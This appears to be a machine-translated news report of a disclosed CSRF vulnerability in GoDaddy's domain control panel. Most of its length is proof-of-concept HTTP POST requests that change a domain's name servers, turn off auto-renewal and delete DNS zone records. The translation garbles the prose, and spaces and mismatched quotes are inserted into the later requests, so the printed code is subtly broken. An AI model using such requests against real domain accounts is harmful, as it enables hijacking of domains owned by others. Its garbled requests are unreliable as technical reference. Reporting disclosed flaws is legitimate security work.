Remote attacker may cause gain access to the domains registered with this service.

Security researcher Dylan Saccomanni found CSRF-vulnerability to a domain name registrar GoDaddy,which  allows to  remote attackers to seize control of any domain registered with this company. At the time of publication of the article the gap was not corrected that threatens the compromise owners of all domains registered in GoDaddy.



The specialist said that GoDaddy does not have any means of protection against CSRF-attacks. An attacker can change the name servers, configure auto-renewal and change the zone files. Saccomanni tried to contact the security GoDaddy e-mail and social networks, but he was told that in the near future output correction is not expected. In this regard, the expert decided to make PoC-code exploits.

Name of  servers

Below is a POST-prompted to save the edits for name servers:

POST /dcc50/Modals/DomainActions/NSManageWS.asmx/ValidateNameserver HTTP/1.1

Host: dcc.godaddy.com

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:34.0) Gecko/20100101 Firefox/34.0

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/json; charset=utf-8

X-Requested-With: XMLHttpRequest

Content-Length: 175

Cookie: [REDACTED]

Connection: keep-alive

Pragma: no-cache

Cache-Control: no-cache

{'request':'{"isall":false,"nsobjs":[{"ns":"foo.example.com","ips": [],"index":0,"add":1,"status":""}, {"ns":"bar.example.com","ips": [],"index":1,"add":1,"status":""}]}'}

Auto-renewal

Below is a PoC-code to disable the automatic renewal:

POST /dcc50/Modals/DomainActions/AutoRenewWS.asmx/Commit HTTP / 1.1

Host: dcc.godaddy.com

User-Agent: Mozilla / 5.0 (Macintosh; Intel Mac OS X 10.10; rv: 34.0) Gecko / 20100101 Firefox / 34.0

Accept: application / json, text / javascript, * / *; q = 0.01

Accept-Language: en-US, en; q = 0.5

Accept-Encoding: gzip, deflate

Content-Type: application / json; charset = utf-8

X-Requested-With: XMLHttpRequest

Content-Length: 71

Cookie: [REDACTED]

Connection: keep-alive

Pragma: no-cache

Cache-Control: no-cache

{'request': '{"isAutoRenew": false, "isExtendedAR": false, "extARYears": 0}}

DNS zone file

Below is a PoC-code to change the DNS records in classical manager:

POST /ZoneFile_WS.asmx/SaveRecords HTTP / 1.1

Host: dns.godaddy.com

User-Agent: Mozilla / 5.0 (Macintosh; Intel Mac OS X 10.10; rv: 34.0) Gecko / 20100101 Firefox / 34.0

Accept: text / html, application / xhtml + xml, application / xml; q = 0.9, * / *; q = 0.8

Accept-Language: en-US, en; q = 0.5

Accept-Encoding: gzip, deflate

Content-Type: application / json; charset = utf-8

Content-Length: 922

Cookie: [REDACTED]

Connection: keep-alive

Pragma: no-cache

Cache-Control: no-cache

{"sInput": "<PARAMS> <PARAM name = \" domainName \ "value = \" [REDACTED] \ "> <PARAM name = \" zoneType \ "value = \" 0 \ "> <PARAM name = \ "aRecEditCount \" value = \ "0 \"> <PARAM name = \ "aRecDeleteCount \" value = \ "0 \"> <PARAM name = \ "cnameRecEditCount \" value = \ "0 \"> <PARAM name = \ "cnameRecDeleteCount \" value = \ "1 \"> <PARAM name = \ "cnameRecDelete0Index \" value = \ "1 \"> <PARAM name = \ "mxRecEditCount \" value = \ "0 \"> <PARAM name = \ "mxRecDeleteCount \" value = \ "0 \"> <PARAM name = \ "txtRecEditCount \" value = \ "0 \"> <PARAM name = \ "srvRecEditCount \" value = \ "0 \"> <PARAM name = \ "aaaaRecEditCount \" value = \ "0 \"> <PARAM name = \ "soaRecEditCount \" value = \ "0 \"> <PARAM name = \ "nsRecEditCount \" value = \ "0 \"> <PARAMS> "}

Source: securitylab.ru